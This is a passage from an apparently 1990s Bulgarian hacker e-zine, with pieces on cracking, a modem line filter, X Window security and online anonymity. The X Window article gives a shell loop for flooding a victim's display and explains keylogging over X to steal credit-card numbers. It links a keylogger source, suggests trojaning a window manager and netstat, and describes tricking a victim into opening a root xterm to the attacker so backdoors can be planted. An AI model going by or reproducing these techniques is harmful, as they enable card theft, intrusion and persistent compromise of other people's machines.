Za po-goljama gawra s Microangelo, mojete da go izpolzwate, za da si
kradnete njakoja ikona, kojato wi haresa naj-mnogo, ot negowite EXE-ta, za
da si ja slojite na KeyGen-a, moje i bitmap-kartinkata s logoto da si
izmuknete i da si ja slojite kato fon na dialoga, pod editbox-owete.
Towa e ot men. Happy cracking. Have phun. ...
Za kontakti i psuwni - Phreedom MessageBoard.
04.06.99
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#12ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Increasing the Resistence of Phone Line Stoiko & 1/2
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Edin nai ybiknoven den.Vie ste v interneta. I ste se zadylbali v niakoi
sait. I po edno vreme vryzkata vi zamira i se chyva edno cyk. Nepriatna
rabota no kvo da se pravi BeTeKato si e svyrshila mrysnata rabota. Ta kvo
sledva edno iako psyvane i aide pak nabirate. I taka do bezkrai. Taka no
shto vmesto da si morim ezicite s psovni ne si pomognem sami ? Dobre no kak.
Zashto kym modema da ne vkluchim ystroistvo koeto filtrira smushteniata i
taka usiguriqva stabilna vryska i visoka skorost ! E sega shte razgledame
edna takava sxemichka. Tia sluvi za filtrirane na izlishnite smyshteniata po
telefonnata linia. Svyrzva se neposredsveno sled modema i e prosta za
naprava! Eto:
0-----------------------------------------------0
| | |
------- --- -----
------- R2 | | C3 -----
C1 | | | |
| --- |
| | |
| ------ |
| R1 ------ C2 R3 |
| _____ | _____ |
0--------|_____|-------------|_____|--------------0
C1 - 0.1 milro Farada
C2 - 47 mikro Farada
C3 - 0.1 mikro Farada
R1 - 100 oma
R2 - 60 oma
R3 - 100 oma
Niama znachenie koi ot dvata kraia shte vyrjete kym modema - koito si
izberete wryzwate smelo, a drugiat kym telefonata linia. Rezistoryt R2 ima
malko po-osobeno znachenie. Pri men sxemata raboti dobre sys stoinost na R2
= 60 oma. No pri vas moje da ne stava s nego! Toest poradi razlichia vyv
liniate i vyv modemite. Moje da probvate s razlichni stoinosti na R2 ot 40
do 70 oma dokato poluchite optimalna nastroika.
Da priemem che ste napravili sxamata i ste gotovi da ia probvate. Predi da
ia svyrjete proverete vsychki vryski niakolko pyti !!!. Ako niakade ste
napravili gaf po vryskite MOJE DA VI IZGORI MODEMA. Taka che proverete
niaklko pyti.Taka ako sled vklychvane na sxemata ne se yvelichi skorosta a
naprotiv to triabva da promenite R2. toest da go namalite. Kolkoto to e
pogoliamo tolkova po stabilna vryska ima no na po malka skorost. Taka che
naglasete go dobre !!! Taka malko saveti za stabilna i byrza vryska
1. Taka. Ako telefonata linia se izpolzva ot modema i niakyv telefon.Ta
zadyl - jitelno telefona triabva da se vyrje kym modema tam kydeto pishe
PHONE. Ta taka vyrzan kato nabirate ot modema telefona se izklychva ot
liniata. V protiven slychai kagato izpolzvate modema telefona shte okazva
negativno vlianie!
2. Izpolzvaite ysykan kabel na vryska na liniata do modema vi. NE
izpolzvaite ednojilen. A mnojilen usukan kabel. Toj e po ystoichiv na
smyshtenia i parazito indyktirani signali !!!
3. Ako telefonyt vi e niakoi star model. Kym rozetkata s koiqto se vryzva
telefona ima edno syprotivlenie. Maxnete go, samo w sluchaj che ne ste
vyrzli telefona kym modema toest vyw vxoda PHONE. W tozi sluchaj niama
smisal da go maxate !!!
4. Xybavo de da proverite vsichki vryski po liniata. Taka che da ne vi se
razpada vryskata pri nai malkiat viatar.
Uspex pri borbata s loshite linii !
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#13ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
X Window Tips & Tricks Spite Master
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Prawi mi wpechatlenie, che naposledyk Linux izliza ot Zonata na zdracha w
Bylgaria i zapochwa da pridobiwa wse po-shiroka populqrnost dori i sred
obiknowenite potrebiteli. Suma ti spisaniq se izrediha da predlagat CD-ta s
distribucii na Linux, w towa chilso PC Magaizine s GNU/Debian (slink) i
Computer World sys RedHat 6.0. I dokolkoto klientite na tezi spisaniq sa
predimno ot kontingenta na M$ Windows (narichan za kratko Woza), to kuco i
sakato se wturna da si instalira grafichnata sistema X Window (izwesten
oshte kato X), bez da si dawa smetka kolko korenno razlichen e toj ot Woza i
kolko opasnosti krie neprawilnoto mu izpolzwane. Zatowa reshih da hwyrlq
malko swetlina wyrhu wyprosa. Pyrwonachalno misleh da izredq wyzmovnite
nepriqtnosti, koito mogat da wi se sluchat pri neprawilno izpolzwane, a i
syshto taka kak move da se wyzpolzwate ot tqh, no EXo kaza, che bilo mnogo
"bare" i zatowa reshih da go prenapisha totalno. Napynah se i eto kakwo
izmydrih:
1) Shto e to X Window i kyde ima pochwa to?
Cqlata isteriq s X zapochwa predi dosta wreme, kogato w MIT se hwanali da
naprawqt uniwersalna i prenosima grafichna sistema za Unix platformite. Ta
pochnali da pishat momchetata, pisali, pisali (i nakraq se osrali, no towa e
tema na drug razgowor) i stignali do ideqta za t.nar. X/Open Transport
Protocol. I poneve na powecheto ot was, koito sa se zanimawali s mrevi, se
predpolaga che dumata Transport Protocol im gowori samo za edno - mrevowa
wryzka, shte kava - da, X e mrevowa grafichna sistema. Tochno tuk se qwqwa
"neznachitelnata" razlika s Woza-ta. Pri X se izpolzwa koncepciqta client/
server, koeto oznachawa, che prilovnite programi i samata grafichna sreda sa
otdeleni etdna ot druga chrez transporten layer, realiziran po edin ot
dwata nachina: podelena pamet ili socket-i. Wivdate li razlikata s Woza?
Nqma DLL, nqma far calls.
Ot tuk proiztichat nqkolko interesni i polezni osobenosti na X: edin X
server (mashina s grafichna karta, mnogo RAM i moshtna mrevowa wryzka) move
da obsluvwa nqkolko mashini w mreva, pri towa programite rabotqt na tezi
mashini, a samite prozorci izlizat na ekrana na X servera. Towa pyk e powod
za nalichieto na edin shtrashno balamski metod za "remote root". Nalichieto
na razdelno adresno prostranstwo prawi syshto taka newyzmovno syzdawaneto na
hook-owe, i takiwa w X nqma. E, ima neshto podobno, no to raboti na sywsem
razlichen princip, i e neshto kato hook-a WH_CALLWNDPROC, no e s filtyr na
sybitiqta i analogiqta ne e pylna.
I taka, X ima mnogo raznowidnosti, swobodni i komersialni, i pochti wsqka
uwavawashta sebe si OS ima X server i biblioteki za protokola na X (iskam
da podchertaq, che Woza ne poddyrva X, no pyk DEC, VMS i oshte nqkoj ot
ekzotichnite OS si go imat standartno). W momenta naj-razprostranen sred
Linux distribciite e swobodniq XFree86, no nqkoi komersialni distribucii
predlagat i drugi widowe. Naj-loshoto na XFree86 e che ne poddyrva shared
memory realizaciq na protokola si, koeto pyk ogranichawa broq pikseli w
sekunda pri izchertawane na rasterni grafiki i namalqwa broq fps na MPEG
player-a, tyj kato mrevowata podsistema na Linux e ogranichena w skorostta
si. Syshto taka wie ne movete prosto da podadete ukazatel kym struktura w
pametta na X i toj da izpylni neshto wyrhu neq, trqbwa da mu q izpratite
cqlata. X ima edin otwratitelen stream protokol, za kojto pishe w RFC-to.
Estestweno, nikoj lud ne pishe programi koito otwarqt socket do server-a i
pochwat da mu prikazwat direktno! Za tazi cel e izgradena bibliotekata
libX11 (ili Xlib). X11 idwa ot naimenowanieto na protokola: X11R6, t.e. X
v11, revision 6, koeto pyk e naj-razprostranenoto w momenta (ima R1-R5, no
kakto se doseshtate te w srawnenie s R6 sa neshto kato Lada srawnena s Mazda
- i dwete sa koli, i dwete se dwivat, ama Mazdata 2x po-byrzo). Ta Xlib
predostawq edno API deto e mnogo po-razlichno ot towa na Woza (znam za
WinAPI realizaciq za X, ama wsichki q pljuqt) i koeto wi predostawq dostyp
do naj-osnownite komponenti: shriftowe, cwetowe i palitri, whodni ustrojstwa
(ne samo mishki, ami i tableti, pisalki, digitajzeri - wsichki sa s edno
API), bitmap-i i pixmap-i (b&w i cwetni kartinki), prawoygylni oblasti ot
ekrana i grafichni primitiwi. I towa e osnowata na X! Nishto poweche. Nqma
butoni, nqma prozorci, nqma skroleri, nqma tajmeri, nishto! Ako iskate da ne
si pishete sami butonite, polzwate nqkoq GUI biblioteka realizirana wyrhu
Xlib; ako iskate prozorci, shte wi trqbwa WM (Window Manager) kojto da wi gi
risuwa; ako iskate tajmeri, napishte si gi! Ottam idwa osnowniq problem na
X: lipsata na edinen interfejs kakto wyw Woza. Edno wreme MIT napisali edna
biblioteka libXaw (Athena Widgets), ama tq e bila za b&w displei i e
otwratitelna (pone srawnena s towa kak izglevda Mac na b&w).
Posle Athena se razwila w Motif, kojto obache struwa mama si i bashta si, da
ne goworim ako iskate da develop-wate na nego. Sega mnogo komersialni
Unix-i, w towa chislo Solaris, Irix, SCO polzwat Motif. SunOS, za da e
po-razlichna ot drugite polzwa OpenLook, kojto pyk nqma absoljutno nishto
obshto s nikoj GUI, kojto nqkoga ste wivdali (napr. wmesto kareta za
wywevdane ima redowe, wse edno pishete w tetradka za prywoklasnici). Ama az
neshto mnogo se otplesnah ot osnownata ideq. Sega mislq che e wreme da wi
pokava kakwo move X i kak mogat da wi go ..... (s pomoshtta na X)
2) Ebawki s washiq X server
Kakto weche kazah, programite i X sa razdeleni s mrevow layer i move da se
prenasochi izhodyt na edna programa kym proizwolen X server, kojto pozwoli
da se wyrvem s nego. "Prenasochi" ne e naj-podhodqshtata duma, tyj kato
fakta, che wie gledate prozorcite na washata mashina oznachawa che prosto
Xlib e instruktirana da se swyrve s /tmp/.X11-unix/X0 (Unix domain socket)
ili localhost:0.0 (TCP socket). Nqma da wi obqsnqwam kakwo e Unix domain
socket, chetete info-to. Samo shte wi kava, che towa e socket, kojto naglo
syshtestwuwa kato fajl (wmesto IP ima inode). Ne move da go otworite kato
obiknowen fajl, no movete sys socket(AF_UNIX, ...). Abe kakwo se zanimawam
da wi smilam informaciqta, q chetete Info. Otiwate na Libc:, Sockets:: i
chetete. Otkyde obache Xlib znae kym koj server da se wyrve? Mnogo prosto,
ima si environment za taq cel, i edna promenliwa DISPLAY. Pri izolirani
sistemi, kydeto X-a i programite sa na edna i syshta mashina DISPLAY=:0.0.
Formatyt e DISPLAY=<host>:<display>.<screen> i ako <host>==NULL, to towa e
lokalna wryzka (chrez podelena pamet ili Unix domain socket), inache se
sydyrva hostname ili IP na X server. <display> e nomera na displeq kojto X
poddyrva.
Chuwali li ste, che ima kompjutri s poweche ot edin ekran? Ne!? E, weche
znaete, che X si gi poddyrva bez problemi. Dokato <display> move da e cql
nabor ot ekrani, to wseki otdelen ekran si ima nomer <screen>. I taka, na
washto PC ili Alpha imate samo edin ekran, i togawa 0.0 wi wyrshi idealna
rabota. Obiknoweno X wisi na port 6000+<display>, edin netstat bi wi go
pokazal. E, weche ako iskate da si puskate programite na ekrana na Pesho,
trqbwa prosto da slovite DISPLAY=pesho.phreedom.org:0.0 i gotowo! S edna
malka podrobnost: naj-weroqtno e da poluchite syobshtenie za greshka ot Xlib
che ne move da otwori ekran poradi "connection refused". Aaaa, kwa bila
rabotata! X ne puska toku-taka wseki da mu se puska, podobno na towa kak ne
prespiwate sys wsqka|wseki, koqto|kojto wi se puska|predlaga. Abe, izmislili
sa go horata, slovili komandata `xhost'. Pishete neshto ot roda: `xhost
+host' ili `xhost -host' i host weche ima|nqma dostyp do washiq X server.
Ima i sykrateni wersii, `xhost +' i `xhost -', koito operirat sys wshicki
ip-ta. Kato napishete `xhost +' poluchawate w otgowor neshto ot roda, che
kontrola za dostyp bil zabranen i wseki movel da se wryzwa. Sys minusa stawa
tochno obratnoto. Ako iskate samo localni wryzki, nalaga se da napishete
'xhost +local:'. Ako pyk iskate da zabranite wyobshte TCP-to kato protokol
na X, shte se nalovi da go puskate s opciq `-nolisten tcp'. Kakwo mogat da
wi naprawqt, ako pogreshka razreshite na nqkoj gadnqr da se wryzwa kym
syrwyra wi?
2.1) Backing Pixmap ataka
Kakto weche spomenah, kogato se nalaga da se izobrazi neshto na ekrana, to
trqbwa da byde prehwyrleno ot pametta na programata do pametta na server-a
prez transportniq protokol, koeto move da e dosta bawno pri bawna wryzka
(chetete tochka 3 za primer). Za celta momchetata ot MIT izmislili backing
pixmap-a, koeto e wsyshtnost neshto kato memory DIB pri Woza. Chertaete si
wie w pixmap-a, a kato se nalovi karate X da go bitblit-ne na ekrana. Taka
kato se otkrie chast ot prozoreca wi nqma da se nalaga da q prechertawate
nanowo i cqlata informaciq da se prehwyrlq po mrevata. Hubawo neshto, ama
ima samo edin problem. Obiknoweno X wyrwi kato root:root, koeto oznachawa,
che za nego nqma ogranicheniq w izpolzwaneto na resursite. I ako nqkoj
idiot reshi, che mu e pritrqbwal prozorec 32000x32000 sys backing pixmap,
pri towa s TrueColorVisual (24 ili 32 bpp), to 3 GB RAM hwrykwat. Oswen
ako ne ste si kupili kompjutyra specialno za Woza 2000, to imate osnowanie
da se pritesnqwate kakwo tochno shte stane s gorkata wi mashina.
Backing pixmap move da se naprawi po naj-razlichni nachini, naprimer s GTK+
stawa naj-lesno (prikazwam taka zashtoto oshte ne sym otkril kak tochno
stawa s normalnata Xlib :). Zapomnete, ne e neobhodimo da imate na servera
GTK+, stiga atakuwashtiq da go ima. Pri was idwa samo grafichniq potok, a
pri nego otiwa samo potoka ot sybitiqta (i dosta, ama dosta mnogo, sluvebna
informaciq, koqto hich ne se interesuwa koj q e generiral, dali Xlib ili
neshto nad Xlib). Abe wsichki opirat do Xlib w krajna smetka. A, ako pyk
shte polzwate mashinata si samo za Xserver, to spokojno move da zatriete
powecheto neshta w /usr/X11Rx/lib. Napishete `ldd /usr/X11/bin/X' za da
widite kakwo polzwa X i wivte fajla XF86Config da widite kakwi moduli se
zarevdat. Taka che wnimatelno podbirajte host-owete na koito razreshawate
dostyp, ili pyk puskajte X-a s opciq `-bs', koeto shte zabrani Backing Store
na wshicki ekrani. E, i pri lokalnite wryzki shte padne skrostta, no pone
shte bydete zashtiteni. A, shtqh da zabrawq, nali razbrahte, che wyprosnite
pixmap-owe sa w adresnoto prostranstwo na server-a, a ne w towa na
klientskata programa?
2.2) Windows Flood ataka
Towa e prosto. Zlovelatelqt e s golqma mashina (mnogo RAM i golqma process
tablica) i ima qka wryzka s was. Neka washiqt host e balam.phreedom.org, a
negowiqt e hitar.phreedom.org. Wie ste se izbalamili da napishete: `xhost
+hitar.phreedom.org', pyk toj se e izhitril da napishe:
while [ 1 ]; do
xmessage "Ebah li ta sega!?" -display balam.phreedom.org:0.0 &
done
Opciqta `-display ...' e standartna za wsichki programi, koito polzwat Xlib
i po syshtestwo otmenq stojnostta na promenliwata DISPLAY. Formata e syshtiq
kato na DISPLAY. I kakwo stawa? Ekrana wi pochwa da se pylni s prozorci s
otwratitelen wid (xmessage polzwa Athena), w kojto pishe onowa necenzorno
syobshtenie, a otdolu mu ima edin grozen zakryglen buton okay. I dokato ne
go ubiete s prozorechniq menaver ili ne natisnete butona, to syobshtenieto
si stoi i wi zagrozqwa ekrana. Neshto podobno stawa s ICQ za Woza kato go
flood-qt. Edin sywet: instalirajte si 3D wersiq na Athena za po-dobyr
wynshen wid na xmessage. Ima wersii koito emulirat W95 i NeXT. Ako wi myrzi
da zatwarqte wsichki prozorci i ako prozorechniq wi menaver nqma opicq `Kill
all windows' (a az ne sym zabelqzal nqkoj da ima), ostawa wi samo da
natisnete LAlt+LCtrl+BackSpace (L znachi Left) i da ubiete X. A ako ste
zabranili towa pri konfiguriraneto na X-a, mojte syboleznowaniq. Movete samo
da pusnete edin xterm (ako X ne se e pretowaril ot mnogoto wi prozorci) i da
napishtete `killall -9 X'. Towa garantirano shte utrepe X. E, move i
po-lesno da stane, ako prozorechniq menaver ima komanda 'Exit', a oshte
po-dobre 'Exit session' :-) Washiqt sigurno ima ...
2.3) Remote Fishing
(Towa tuk si mislq che shte e naj-interesnoto...)
Nqma nachin nqkoj ot was da ne e pisal KOHe za kradene na kreditni karti.
Kyde sys prihwashtane na klawiaturata, kyde sys skanirane na prozorcite,
naj-razlichni metodi. I wsichki te se oslanqt na dobrite stari hook-owe. Pyk
i programite trqbwa da se kriqt, da se instalirat tajno i t.n. E, pod X hook
ne move da se instalira zaradi mrevowiq razdelitel, koeto e losho. Ot druga
strana suma ti narod pazaruwa prez WEB, a Linux ima i Netscape, i Mosaic, i
RedBaron, i edna kamara browser-i oshte (da ne zabrawq lynx :) Bi bilo valko
ako se okave, che Linux potrebitelite sa imunizirani sreshtu podoben rod
ograbwane.
E da, ama ne! X predlaga unikalno reshenie. Wseki prozorec, kojto se namira
na ekrana, move da byde instruktiran (t.e. X-a) da izprashta sybitiqta si na
drugi programi, pri towa wsqka edna ot tqh si podawa zaqwkata indiwidualno.
Naprimer, hareswam si az edin xterm w kojto raboti root-a, wzimam mu
prozorechniq descriptor w promenliwata `win', `d' mi e opisatelq na displeq
(wryzkata), kakto go wryshta XOpenDisplay, i kazwam: XSelectInput(d, win,
KeyPressEvent); O, chudo! Pri wsqko natiskane na klawish w prozoreca na
xterm, w opashkata na moqta programa se poqwqwa sybitie za natisnat klawish.
Ostawa samo da go transliram! Hi, hi, weche wivdam wsichko, koeto root-a
pishe. I toj ne znae towa, poneve az ne sym pusnal programata na negowiq
kompjutyr, a na moq (otnowo DISPLAY i xhost) i programata mi ne e syzdala
prozorec. Estestweno, ako onq pich napishe `netstat -an' shte widi wryzkata,
no towa sa si riskowete na profesiqta. I ako weche ne ste me razbrali kakwo
imam predwid! Kradete CC-ta bez dori i da puskate nqkakyw kod na mashinata
na vertwata. Prosto trqbwa nqkyde da wmyknete `xhost +washto.ip'. Sledwa
durgata wavna stypka, che XSelectInput trqbwa da se izwika za wseki
prozorec, ne samo za glawnite, t.e. trqbwa da se wika rekursiwno. Za tazi
cel si ima XQeryTree. Pochwate ot desktop (ili root) prozoreca i
prodylvawate do dyno. I ne e zle da prawite towa prez nqkakyw interwal ot
wreme, da rechem 1 sec, inache nqma da hwanete nowite prozorci (poqwili se
sled puskaneto na programata). E, ako ne wi se wisi po cql den i cqla nosht
pred conzolata (ili Eterm-a ako ste ljubiteli na X-cheto), to prawite edin
skrolirasht bufer, 2 KB, typchete wytre wsichko koeto hwanete, obrabotwate
<Tab> i <BackSpace> i sledite dali nqma da se poqwi nqkoj waliden nomer na
kreditna karta. Ako stane, kakto kazwa Star Gruhtar w Phreedom Magazine #16,
wzemate 1 K predi towa i 1 K sled towa i `save to disk' :) A move da logwate
i wsichko, ako iskate.
Estestweno, taq programa move da se pusne i na kompjutyra na vertwata i da
ne se nalaga da wmykwate skrishni izwikwaniq do xhost. Togawa se pishe kato
standarten KOH sys wsichkite mu kriptografii, problemi s wryzkata,
neobhodimost ot mail server i t.n. i t.n. Wsichko e wypros na izbor. Ako
imate permanentna i stabilna wryzka s mrevata wyprosniqt KOH se swevda do
edna malka programka koqto dobawq izwikwane kym xhost na neobhodimite mesta
i wi prashta po mail IP-to i versiqta na sistemata (uname -a), kakto i
wersiqta na X-a, koeto move da se razbere kato pretyrsite diska za
direktoriq X11Rx, kydeto x E {2,3,4,5,6} (E da se chete kato 'e element
na'). Estestweno nqma da go prawite po metoda, kojto `find' polzwa, a shte
slovite po edin sleep mevdu otwarqneto na otdelnite direktorii, zashtoto ne
iskate da wdignete load-a do nebeto! Az lichno predpochitam pyrwiq metod,
zashoto e naprawo life da si stoish u was i da gledash kak vertwata se
obqsnqwa na nqkakwa|nqkakyw po ICQ|IRC|(skoro i po SPIRT :). No towa ne
winagi e wyzmovno, osobeno ako vertwata podobno na men si puska iptraf w
prozorec i neprekysnato si sledi wryzkite. Togawa move da opitate da
bryknete nestho w kernela i da prawite skriti wryzki po nqkakwi non-IP
protokoli. A move prosto da troqnizirate iptraf i netstat.
Ako wsichko kazano do tuk wi zwuchi kato na korejski i nqmate bykel ideq kak
se prawi na praktika wsichko towa, to eto wi edno URL kydeto ima edna
primitiwna programa, koqto prihwashta klawiaturata pod X:
ftp://ftp.technotronic.com/unix/xwin-exploits/xkey.c
Hwashtate q, modificirate q (prashtate mi q po e-mail) i zapochwate da se
radwate na viwota i da hodite po-chesto na balkan i na chist wyzduh. Takyw
KOH e naj-dobre da se nabuta w nqkoj Window Manager, poneve posledniqt ima
swojstwoto da poluchawa specialni sybitiq ot X pri syzdawane i premahwane
na prozorci i shte opadne neobhodimostta ot tajmer. Pyk i wyw wseki moment
shte se znae koj e aktiwniq prozorec. Naprimer waliden nomer na kreditna
katra move da se wywede i w XCalc (kalkulartor za X), no toj edwa li shte
byde ot polza. Wsichko e wypros na ambiciq, wyobravenie i programistki
umeniq. Ako imah dostatychno ot poslednoto dosega polowinata ot was weche
stqha da polzwat troqnski WM :-)
2.4) Da si napishem proxy
Do tuk dobre. Obache se nalaga da razreshite na nqkakyw host da se wryzwa
kym washiq X server. Kakwo stawa pri opit za wryzka? X priema wryzkata i
mu wzima IP-to. Posle prerawq edna wytreshna tablica da tyrsi dali na towa
IP e razresheno da se wryzwa, i ako ne e zatwarq socket-a, a pyk toj wivda
slednoto syobshtenie:
Xlib: connection to "xserver.phreedom.org:0.0" refused by server
Xlib: Client is not authorized to connect to Server
Error: Can't open display: xserver.phreedom.org:0.0
Mnogo nepriqtno. Obache, ako pusnete iptraf, shte widite che wse pak ima
obmnqna na informaciq po socket-a predi toj da byde grubo zatworen ot X-a.
Towa pyk nawevda na ideqta, che move da se opita syzdawane na golqm broj
wryzki ili chrez normalni TCP connect(...), ili chrez SYN flood. Efektyt e
che X taka krasiwo zawiswa, che chak dushata mi se razliwa ot kef kato go
gledam.
I za da ne stawat takiwa diwotii se pishat proxy-ta. Kakwo se prawi? Pyrwo
se zabranqwat nelokalni TCP wryzki chrez opciqta `-nolisten tcp', pri towa
X ostawa samo na Unix domain socket /tmp/.X11-unix/X0. Posle se razreshawa
lokalna wryzka sys 'xhost +local:'. Naj-nakraq se puska edno proxy, koeto
wisi na porta na X-a (6000+<display>), i kato poluchi zaqwkata prowerqwa w
negowa si tablica s hostowe ili prowerqwa magic cookie-to i ako wsichko e
nared, wryzwa se na Unix domain socket-a i zapochwa da raboti kato prost
port redirector. Prosto kolkoto si iskash, dori typo. Taka pri edin flood
naj-mnogo da izgyrmi proxy-to, a wie dori i nqma da razberete che neshto se
e sluchilo. No towa ne e wsichko. Wyprosnoto proxy move dori da byrnika
obmenqnite danni i chat-pat da postawq razni dopylnitelni komandi kym X-a,
naprimer da smenq tipa na kursora, kato pri towa awtomagichno go animira.
Syshto taka move da si prawite kakwi li ne shturotii, no za tazi cel shte wi
e neobhodimo dylboko poznawane na samiq X/OTP.
Nakraq rezultatyt e, che wse edno dinamichno dobawqte kod w prilovenieto,
dori i nikoga da ne ste wivdali izpylnimiq fajl i dori i da ne znaete koj go
puska i kyde tochno go puska. No towa e to, X Window! Kakto se kazwashe na
edno mqsto: "X Window - Power Tools for Power Fools" :-), a syshto taka i:
"X Windows - Your nightmares come true"! Towa go pisheshe w programata
fortune, chieto prednaznachenie e da naprawi Unix malko po-zabawen kato
puska razni mydrosti po velanie na klienta. E, sami si wadete
zakljucheniqta. Mevdu drugoto, X ima edin strahoten screen saver s
blyskashti se galaktiki...
3) "Remote root" po balamskiq metod (a.k.a. "stiga sa se ebawali s men,
i az iskam da se ebawam s nqkoj")
Dobre, dobre! Sega shte obqsnq kak move s pomoshtta na X server i malko
social engeneering da pridobiete shell na chuvda mashina (che dori i root,
ako vertwata e lekowerna). Pyrwo trqbwa da si pusnete X-a i da razreshite
wryzki ot host-a na vertwata sys `xhost +vertwa.phreedom.org'. Posle se
hwashtate da ubevdawate vertwata, che ste napisali nowo moshtno proxy za X i
trqbwa speshno da go testwate, zashtoto utre sutrinta trqbwa da go
predadete na firmata za koqto rabotite. Estestweno, ochakwat wi dosta $-i i
golqma pocherpka za tiq, koito se nawiqt da wi testwat proxy-to. Obache
trqbwa da se pusne `xterm', i to kato root, poneve predi se dynelo w nego
sluchaj, a wie si mislite che ste oprawili bug-a. Edinstwenoto koeto tq
(vertwata) trqbwa da naprawi e da napishe w edin root-ski terminal towa:
`xterm -geometry 80x5 -display xserver.phreedom.org:0.0 &' i da chaka da
mu se pokave na ekrana xterm-a. Ako wnimatelno ste procheli wsichko do tuk
trqbwa sami da se dosetite, che shte ima dosta dylgo da chaka. W syshtoto
wreme pri was, element po element shte zapochne da se poqwqwa ne ekrana wi
edin prekrasen root-ski xterm. Zashto element po element? Ami zashtoto wie
ste na 28.8 kbps PPP dial-up, a protokolyt na X e dosta chuwstwitelen po
otnoshenie na skorostta na wryzkata. Pusnete si iptraf i shte razberete za
kakwo goworq. Zatowa e i opciqta `-geometry 80x5'. Tq kazwa: 80 koloni po 5
reda. Ampersanda prashta programata na zaden fon. Obiknoweno vertwata wi
otgowarq sys slednoto: "Ami to mi izwede nqkakwo chislo w kwadratni skobi i
sega pak mi dawa da wywevdam komandi. Nishto ne izliza!" Abe ne byrzaj,
chakaj, wryzkata e bawna! W syshtoto wreme znaete kakwo move da se naprawi s
edin root-ski shell, nqma i towa da wi obqsnqwam. I dokato onq razbere
kakwo stawa, weche ima pone 5 razlichni backdoor-a.
Kogato izmislih taq taktika se symnqwah che nqkoj wyobshte shte se hwane na
toq prozrachen nomer. Wseki Unix-ar, kojto razbira pone malko ot X shte mi
tegli edna cwetushta i poweche nqma da mi obryshta wnimanie. No kakto
spomenah w nachaloto, kuco i sykato trygna da si slaga Linux, i se okaza,
che ima balamurnici, koito se hwanaha na taq wydica. Nqma da citiram imena i
nickowe za da ne obidq nqkoj. Shte kava samo: "Momcheta i momicheta deto
za pyrwi pyt wivdate Linux i se prawite na golemi specialisti. Wnimawajte
kakwo pishete po terminalite i kakwi programi puskate. Chetete po-chesto
Phreedom Magazine i ne se prawete na mnogo umni, naj-malkoto po IRC i to w
kanalite #phm. Ne znaete kakwi idioti dremqt tam (napr. Moq Milost) ;^)"
// e towa w kawichkite move i da ne se publikuwa :-)
4) Zakljuchenie
W zakljuchenie iskam da kava slednoto. X Window naistina e "power tool", no
ako ne go razbirate i ne movete da se oprawqte s nego lesno move da se
prewyrnete wyw "power fool". Towa e edna moshtna, no kaprizna grafichna
sreda, za koqto trqbwa obache da se grivite kato za Tamagochi. W sluchaj
che polovite dostatychno grivi za neq (ili nego, oshte ne sym i/mu razbral
pola na X), sistemata X Window move da wi predlovi edin strahoten raboten
ekran i nikoga poweche nqma dori i da pomislite da go puskate bez X (da se
razbira che goworq za Woza). Otnowo wyw fortune pisheshe:
"What's worse than X Window? (Tip: try it without the `X')"
Pylnoto opisanie na X zaema clq raft s knigi ot po 1000-2000 stranici i e
absoljutno newyzmovno da se nabuta w spisanie ot roda na Phreedom. T.e. ne
che ne move, ama nqma da move da go izteglite :-) Tuk wi dadoh bazata, a ako
se zainteresuwate, chetete man stranici, kupuwajte si knivki s kradeni
kreditni karti, uchete se i mislete. Mqsto za nowi idei - bol (towa ne e
Bulgaria Offline, a turskata duma za `kolktoto si poiskate')! Pyk ako wi
se priiska, move i da mi pishete na spitem@phreedom.org, nqma da wi se
razsyrdq.
P.S. WAVNO: Nikoj ot spomenatite po-gore host-owe w domejna phreedom.org
ne e realno syshtestwuwashta mashina. Wsqko sywpadenie s imena na
realni hora i mashini e sluchajno. Wsichki geroi sa izmisleni ot men,
awtoryt na statiqta. Prosto domejna na Phreedom strashno mi hareswa.
signed: spaitcho
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#14ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Cyber Anonymity Tutorial MiCRoPhoBIC
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Ne znam dali pri vsichki e taka, no lichno az kato sedna pred klaviaturata i
si mislja, che veche nikoi ne moje da mi kaje nishto, che sym napylno
anonimen, che moga da kaja/pravja kakvoto si iskam. Tova e kato pri
telephona - govorish si s njakoi i prez tova vreme mojesh da si pravish
kakvoto i da bilo drugo bez da te e strah, che choveka, s kogoto govorish,
shte razbere tochno s kakvo se zanimavash. (btw. Poznavam chovek, koito moje
da govori po telephona dokato igrae Need For Speed..!)
No tova e izmama, zashtoto vsichko, absolutno vsichko, koeto se pravi, moje
da se razbere. Tova, che chovekyt otsreshta ne te vijda 3D, ne oznachava,
che ne znae/moje da razbere neshto za teb. Ta ako sym stresnal njakogo, moje
da prodylji da chete, zashtoto vse pak syshtestvuva pone malka anonimnost i
ako chovek znae kak da ja izpolzva, shte mu e dosta po-lesen jivotyt, a pyk
i shte si go jivee na svetlo ;-)
Ne okurajavam nikoi da se vyzpolzva ot tazi anonymnost za 'illegal' celi. No
vse pak tova si e vasha rabota. Samo deistvaite razumno.
Neka zapochnem s WEB:
Vseki si misli, che browse-vaneto e kato da prochetesh vestnik, da go
hvyrlish i prosto da si vzemesh drug i t.n . Na tezi hora bih kazal -
poglednete si rycete... oshte ne ste razgyrnali vestnika i veche imate
miniaturni sledi ot mastilo po prystite... miniaturni, NO dostatychni, za da
